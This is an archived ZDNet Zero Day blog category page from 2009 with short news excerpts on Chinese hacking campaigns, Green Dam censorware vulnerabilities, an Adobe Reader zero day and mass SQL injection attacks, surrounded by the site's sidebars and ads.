ZDNet Must Read:
Microsoft confirms 'detailed' Windows 7 exploit
Microsoft has issued a security advisory to acknowledge a crippling denial-of-service flaw affecting its newest operating systems -- Windows 7 and Windows Server 2008 R2.... Continued »
Category: People's Republic of China
November 9th, 2009
CBS 60 Minutes tackles cyber-terrorism
Could hackers get into the computer systems that run crucial elements of the world’s infrastructure, such as the power grids, water works or even a nation’s military arsenal? Watch the CBS News 60 Minutes segment after the jump. Read the rest of this entry »
September 29th, 2009
Chinese hackers launch targeted attacks against foreign correspondents
According to an assessment published by the Information Warfare Monitor, Chinese hacktivists (politically motivated hackers) have recently launched a targeted malware attack against foreign news correspondents attempting to trick them into executing a malware-embedded PDF attachment (Interview list.pdf), coming from a non-existent editor working for The Straits Times.
The attacks coincide with the upcoming nation-wide celebration of the 60th anniversary of the PRC, and appear to be directly connected to the GhostNet cyber espionage network exposed earlier this year.
Key findings of the assessment include:
July 23rd, 2009
China's Green Dam and the cyberwar implications
Guest editorial by Oliver Day
Chinese military leaders have always been aware of the military advantage the US has over the People’s Liberation Army. Reading through their published assessments of Sino-US war possibilities confirm our belief that we would dominate them in the air, land and sea. However the PLA was born of asymmetric warfare and this remains a core part of their strategies against any possible wars with the US. Specifically the PLA writes about the use of cyberwarfare as a means of countering this imbalance.
Read the rest of this entry »
June 24th, 2009
Remote code execution exploit for Green Dam in the wild
The recently exposed as vulnerable to trivial remotely exploitable flaws Chinese censorware Green Dam, has silently patched the security flaws (China confirms security flaws in Green Dam, rushes to release a patch) outlined in the original analysis detailing the vulnerabilities.
However, not only is the latest Green Dam v3.17 version still vulnerable to remotely exploitable flaws, but also, for over a week now a working zero day exploit (Exploit.GreenDam!IK; W32/GreenDam.A) has been circulating in the wild.
Here are more details on the remote code execution flaw in the latest version:
June 15th, 2009
China confirms security flaws in Green Dam, rushes to release a patch
China’s Ministry of Industry and Information Technology has instructed the developers of the Green Dam censorware, to briefly release a patch in regard to last week’s published analysis detailing the possibility of remotely exploitable vulnerabilities within the software.
Jinhui Computer System Engineering Co, developer of Green Dam, insisted that the software is just a vulnerable as any other, and that their expertise is in coding Internet filtering software, and not necessarily one with security in mind — pretty interesting comment taking into consideration the fact that the developer earned millions in the process of coding it.
May 13th, 2009
China's 'secure' OS Kylin - a threat to U.S offensive cyber capabilities?
Picture a cyber warfare arms race where the participating countries have spent years of building offensive cyber warfare capabilities by exploiting the monoculture on one another’s IT infrastructure.
Suddenly, one of the countries starts migrating to a hardened operating system of its own, and by integrating it on systems managing the critical infrastructure it successfully undermines the offensive cyber warfare capabilities developed by adversaries designed to be used primarily against Linux, UNIX and Windows.
That’s exactly what China is doing right now with their hardened OS Kylin according to Kevin G. Coleman, Senior Fellow and Strategic Management Consultant with the Technolytics Institute who presented his viewpoint in a hearing at the U.S. – China Economic and Security Review Commission.
Here’s an excerpt from the hearing:
February 23rd, 2009
eBay solutions provider Auctiva.com infected with malware
eBay solutions provider Auctiva.com suffered a malware attack during the weekend, resulting in a “this site may harm your computer” badware warning which affected hundreds of thousands of customers and their eBay auctions.
Following the complaints of users who started receiving antivirus software warnings appearing upon visiting Auctiva.com, the company took measures to ensure the transparency of the clean-up process which they finalized yesterday.
According to Auctiva’s update log:
February 23rd, 2009
Chinese hackers deface the Russian Consulate in Shanghai
That was fast. Chinese hackers collaborating with the Chinese Hacking Union, a two-years old training community for wannabe hackers, hacked and defaced the official web site of the General Consulate of the Russian Federation in Shanghai, PRC in response to the recent accusations that a Russian navy vessel has sank a Chinese cargo ship.
The message left on the now “under maintenance” site translates as follows:
February 20th, 2009
Adobe Reader 9 and Acrobat 9 zero day exploited in the wild
Yesterday, Adobe confirmed the existence of a critical vulnerability affecting Adobe Reader and Acrobat versions 9.0 and earlier, originally detected by the Shadowserver Foundation last week.
The onging targeted attacks have since been confirmed by both, Symantec and McAfee urging users to disable JavaScript in Adobe Reader and Acrobat until Adobe issues a patch on the 11th of March in the following way - Click: Edit -> Preferences -> JavaScript and uncheck Enable Acrobat JavaScript.
Symantec’s comments on the potential for massive attacks using the exploit:
December 17th, 2008
Thousands of legitimate sites SQL injected to serve IE exploit
Once again confirming the trend of having more legitimate sites serving exploits and malware than purely malicious ones, Chinese hackers have been keeping themselves busy during the last couple of days, launching massive SQL injection attacks affecting over 100,000 web sites.
The SQL injection attacks serving the just patched Internet Explorer XML parsing exploit, are launched by several different Chinese hacking groups, and with several exceptions, are primarily targeting Asian countries which is a pretty logical move given the fact that it’s a password stealing malware for online games that is served at the bottom line.
Which is the most targeted country?
Dancho Danchev is an independent security consultant and cyber threats analyst, with extensive experience in open source intelligence gathering, malware and cybercrime incident response. He's been an active security blogger since 2007, and maintains a popular security blog. See his full profile and disclosure of his industry affiliations.
Subscribe to Zero Day via Email alerts or RSS.
SponsoredWhite Papers, Webcasts, and Downloads
- Why Isn't Server Virtualization Saving Us More? A Few Small Changes May Dramatically Increase Your Efficiency VMware Companies have rapidly adopted server virtualization over the past few ... Download Now
- Five Steps to Determine When to Virtualize YourServers VMware Server virtualization isn't just for big companies. Entry-level ... Download Now
- Building the Virtualized Enterprise with VMware Iinfrastructure VMware VMware virtualization software has been adopted by over 120,000 enterprise ... Download Now
Recent Entries
- Opera patches ‘extremely severe’ security hole
- Exploit published for critical IE 7 zero-day flaw
- Inside the Google Chrome OS security model
- Microsoft finds security hole in Google Chrome Frame
- Mozilla locks out rogue Firefox add-ons
Blogs From Our Sponsors
Most Popular Posts
- Microsoft confirms 'detailed' Windows 7 exploit
- Thousands of web sites compromised, redirect to scareware
- Windows 7's default UAC bypassed by 8 out of 10 malware samples
- Mac OS X mega patch covers 58 security vulnerabilities
- Which antivirus is best at removing malware?
- Microsoft patches Windows worm holes, drive-by download flaws
Top Rated
- Facebook password-reset spam is Bredolab botnet attack+46 votes
- Microsoft confirms 'detailed' Windows 7 exploit+43 votes
- Thousands of web sites compromised, redirect to scareware+43 votes
- Firefox hit by multiple drive-by download flaws+41 votes
- Which antivirus is best at removing malware?+40 votes
- iHacked: jailbroken iPhones compromised, $5 ransom demanded+32 votes
- New LoroBot ransomware encrypts files, demands $100 for decryption+28 votes
- Mac OS X mega patch covers 58 security vulnerabilities+26 votes
Premier Vendor Content Whitepapers, webcasts & resources from our Power Center Sponsors
- New Online Dashboard for IT Leaders
-
Read about top issues IT decision-makers face every day, plus get cost-effective solutions to real-life IT problems.
- Learn more >>
- Reduce risk. Reduce complexity. Increase reliability.
-
A simplified IT environment isn't just less complex. It's also more reliable. Standardize on a single Linux platform with SUSE Linux Enterprise from Novell, and get the world's most interoperable Linux
- Learn more >>
- Save time with automated shipping solutions
-
The Business Essentials Guide provides you useful tools and templates to help grow your business and save you time with automated shipping solutions.
- Visit the UPS Business Essentials Guide
- Keep Up With The Latest In Document Management with The DocuMentor.
-
Doc delivers the scoop on today's enterprise content management, printer maintenance, and all other issues related to document management. It's the DocuMentor Blog.
- Learn more >>
- Microsoft Dynamics CRM Online - Free Six-Month Trial for Eligible Organizations
-
Microsoft Dynamics CRM Online provides fast online access, simple contact management and better sales performance for a low monthly cost - the best value on the market today.
- Learn more about the free, six-month trial offer>>
Archives
Favorite Links
ZDNet Blogs
- All About Microsoft
- The Apple Core
- Between the Lines
- BriefingsDirect
- Collaboration 2.0
- Dev Connection
- Digital Cameras & Camcorders
- Ed Bott's Microsoft Report
- Emerging Tech
- Enterprise Web 2.0
- Forrester Research
- Googling Google
- GreenTech Pastures
- Hardware 2.0
- Home Theater
- iGeneration
- Irregular Enterprise
- IT Project Failures
- Laptops & Desktops
- Lawgarithms
- Linux and Open Source
- Managing L'unix
- The Mobile Gadgeteer
- On Sustainability
- Rational Rants
- The Semantic Web
- Service Oriented
- Smartphones and Cell Phones
- Social Business
- Social CRM: The Conversation
- Software & Services Safari
- Software as Services
- Storage Bits
- Team Think
- Tech Broiler
- Technology and the Global Supply Chain
- Tom Foremski: IMHO
- The ToyBox
- Virtually Speaking
- The Web Life
- ZDNet Education
- ZDNet Government
- ZDNet Healthcare
- Zero Day
White Papers, Webcasts, and Downloads
- VMware Infrastructure: A Guide to Bottom-Line Benefits VMware Frustrated by the costs of maintain ever larger data centers?or building ... Download Now
- Virtualization: Architectural Considerations And Other Evaluation Criteria VMware Of the many approaches to x86 systems virtualization available in the ... Download Now
- Five Steps to Determine When to Virtualize YourServers VMware Server virtualization isn't just for big companies. Entry-level ... Download Now
Popular Sanity Saver Videos
